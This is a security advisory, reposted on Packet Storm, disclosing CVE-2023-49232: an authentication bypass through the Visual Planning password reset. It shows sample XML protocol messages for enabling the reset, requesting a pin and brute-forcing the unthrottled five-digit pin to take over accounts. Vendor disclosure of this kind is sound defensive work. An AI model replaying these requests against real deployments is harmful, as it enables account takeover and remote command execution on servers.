what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Visual Planning 8 Authentication Bypass

Visual Planning 8 Authentication Bypass
Posted Apr 5, 2024
Authored by David Brown, Lennert Preuth | Site schutzwerk.com

Unauthenticated attackers can exploit a weakness in the password reset functionality of the Visual Planning application in order to obtain access to arbitrary user accounts including administrators. In case administrative (in the context of Visual Planning) accounts are compromised, attackers can install malicious modules into the application to take over the application server hosting the Visual Planning application. All versions prior to Visual Planning 8 (Build 240207) are affected.

tags | exploit, arbitrary
advisories | CVE-2023-49232
SHA-256 | 317fc4e9931be1f5637f8b1a9a92f3305f2b80aa897d807f8b7b94af2fd3c671

Visual Planning 8 Authentication Bypass

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Title
=====

SCHUTZWERK-SA-2023-004: Authentication Bypass via Password Reset
Functionality in Visual Planning

Status
======

PUBLISHED

Version
=======

1.0

CVE reference
=============

CVE-2023-49232

Link
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-004/

Text-only version:
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-004.txt

Affected products/vendor
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary
=======

Unauthenticated attackers can exploit a weakness in the password reset
functionality of the Visual Planning[0] application in order to obtain
access to arbitrary user accounts including administrators. In case
administrative (in the context of Visual Planning) accounts are
compromised, attackers can install malicious modules into the
application to take over the application server hosting the Visual
Planning application.

Risk
====

The application does not impose any limits on the number of guesses that
can be made. Attackers can therefore initiate the reset for arbitrary
users and automate the pin validation process until a valid pin is
obtained. The vulnerability allows unauthenticated attackers to gain
access to arbitrary user accounts including administrators.

Failed pin validation attempts are not logged by the application which
greatly increases the difficulty of detecting ongoing attacks.

With administrative access to Admin Center, attackers can install
malicious modules containing Java code that is executed on the
application server, resulting in arbitrary command execution.

The entire pin space can be enumerated in approximately one to two hours.

Description
===========

During a recent red teaming assessment, Visual Planning was identified
as part of the customers internet-facing assets. The software is
developed by STILOG I.S.T. and provides resource management and
scheduling features. A security assessment conducted by SCHUTZWERK found
an authentication bypass in Visual Planning's password reset functionality.
The application Admin Center (vpadmin) communicates with the server
through an XML-based protocol that utilizes proprietary compression
methods and is transmitted via HTTP. SCHUTZWERK implemented a custom
proxy as part of an assessment in order to intercept and manipulate the
messages exchanged between application and server.

One of the first messages sent by the Admin Center application after
launch is the following:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.NamedMethodParameter>
<methodName>canResetPassword</methodName>
<rawResult>false</rawResult>
<userSession isNull="true"/>
<values/>
</com.visualplanning.query.NamedMethodParameter>

In this request, the client asks the server whether it should display
the "Forgot your password ?" button as part of the login form. During
the assessment, the server responded as follows:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.QueryResult>
<resultValues>
<HashtableValue>
<key>resetPassword</key>
<value class="java.lang.Boolean">false</value>
</HashtableValue>
</resultValues>
<status>OK</status>
</com.visualplanning.query.QueryResult>

By altering the value to "true", the password reset functionality
becomes accessible in the application. At this point, attackers can
provide the target username. This causes a request similar to the
following to be issued:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.NamedMethodParameter>
<methodName>sendResetPasswwd</methodName>
<rawResult>false</rawResult>
<userSession isNull="true"/>
<values>
<HashtableValue>
<key>login</key>
<value class="String">admin</value>
</HashtableValue>
</values>
</com.visualplanning.query.NamedMethodParameter>

While handling this request, the server generates a five digit numeric
pin and tries to send it to the email address associated with the
provided username. Regardless of whether the email could be successfully
transmitted, the generated pin is stored in a attribute of the session
used while performing the reset. It should be noted that the password
reset request message can be sent directly without enabling the button
in the GUI if the message format is already known.

To complete the reset process, the correct pin (matching the pin stored
in the session attribute) must be specified. A message similar to the
following is issued by the application to validiate the provided pin:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.NamedMethodParameter>
<methodName>validateResetPasswwd</methodName>
<rawResult>false</rawResult>
<userSession isNull="true"/>
<values>
<HashtableValue>
<key>login</key>
<value class="String">admin</value>
</HashtableValue>
<HashtableValue>
<key>userCode</key>
<value class="String">58344</value>
</HashtableValue>
</values>
</com.visualplanning.query.NamedMethodParameter>

When an invalid pin is provided, the server responds with the following
XML document:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.QueryResult>
<resultValues>
<HashtableValue>
<key>ERROR</key>
<value class="String">Invalid code.</value>
</HashtableValue>
</resultValues>
<status>KO</status>
</com.visualplanning.query.QueryResult>

In case the pin is valid, the server responds with a VPUser data
structure similar to the following:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.QueryResult>
<resultValues>
<HashtableValue>
<key>vpUser</key>
<value class="com.visualplanning.data.admin.VPUser">
<ID>1</ID>
<UID>C442-53EB-B185-8804-F6BF-70AC-61C3-31BC</UID>
<activated>true</activated>
<comments>Super administrateur</comments>
<email>yahd6Coo@schutzwerk.com</email>
<expiredPasswd>false</expiredPasswd>
<groups/>
<imageProfilBase64></imageProfilBase64>
<ldapSetting>
<entityID>-1</entityID>
</ldapSetting>
<licenses/>
<loginAttemps>0</loginAttemps>
<mobilePhoneNumber></mobilePhoneNumber>
<name>admin</name>
<ownerID>0</ownerID>
<phoneNumber></phoneNumber>
<platform>VP</platform>
<resetPasswd>true</resetPasswd>
<resourceUser>false</resourceUser>
</value>
</HashtableValue>
</resultValues>
<status>OK</status>
</com.visualplanning.query.QueryResult>

In addition, an empty password is set for the target username. Upon
first login after reset, a new password must be set for this user.

Solution/Mitigation
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline
===================

2023-11-01: Vulnerability discovered
2023-11-09: Contact vendor in order to determine security contact
2023-11-10: Received generic sales response from vendor
2023-11-14: Contacted CTO of vendor directly
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor
2023-11-24: CVE assigned by Mitre
2023-11-24: Additional technical details provided to vendor
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings
is in progress
2024-01-30: Inquired about mitigation status regarding the reported
vulnerabilities
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were
already fixed
2024-03-08: Sent advisory drafts to vendor
2024-03-28: Received patch information and release of advisory

Contact/Credits
===============

The vulnerability was discovered during an assessment by Lennert Preuth
and David Brown of SCHUTZWERK GmbH.

References
==========

[0] https://www.visual-planning.com/en/
[1]
https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html

Disclaimer
==========

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
most recent version of this security advisory can be found at SCHUTZWERK
GmbH's website ( https://www.schutzwerk.com ).

Additional information
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0TAaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrtU9xAArJL5rKh3sNRto6xC7bgj
660J6OALXG9O9qaJo1RHYsVo9287THvSgsPs8/YXZhFNtkccsdxRll3t3UxC3IOU
/h+f612I4lFlk9t0LVH2eu6r8lTw47YLbO9RKoBF0TsysJMnytuM9+BxRyd+nLVo
rfVxmRfUhDKf5odkDz8IeatmMMeI1e7JuGylWtVOkSxdbCsmwEbObrEsCwe74AR4
PKJDVb6tq03q1g5H0yq7QLCMyuN7UBc0Jb/sYkL3hu0m7JlqyCVUfNBaD1pqZvlA
C3b+DnrJHwAPYKr5I4pKfss5Ghh3+yIaS/UIyaIImgS6pyBDOJUHULiMKumZYHCl
r3YWOLAjuTUztRmsktavjgItsf2NsXnBLYMDjZuZtBd6iU7iNKQ4EdbCNt8YCN8w
KmU3ot2Kwjty2aLj7CBdg8Mrc4Rr3PH2PoXWxSEBMWqokoO2zWVft+5BpJ/onU2P
um41+KNb7h7Pf/QVkU1KOZbwAI9tgJvZn2hHXmbQov0w3s0J9dqNoJ4Eu+qVPMAx
+Ug9Qvo3Qh325pDEeqxUhOsPh4dHam97ouDYE3XXLlKk8rar8TjhANAHHO4uUltW
gikWB1VVmGy7XS9lflWE1QLqO8BBK1jZUDU21fWQeAeF64R6NXikj0tkfvjOwwt/
CTQ2Nugk2kdYf5d73FSO9ds=
=PvYR
-----END PGP SIGNATURE-----

--
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close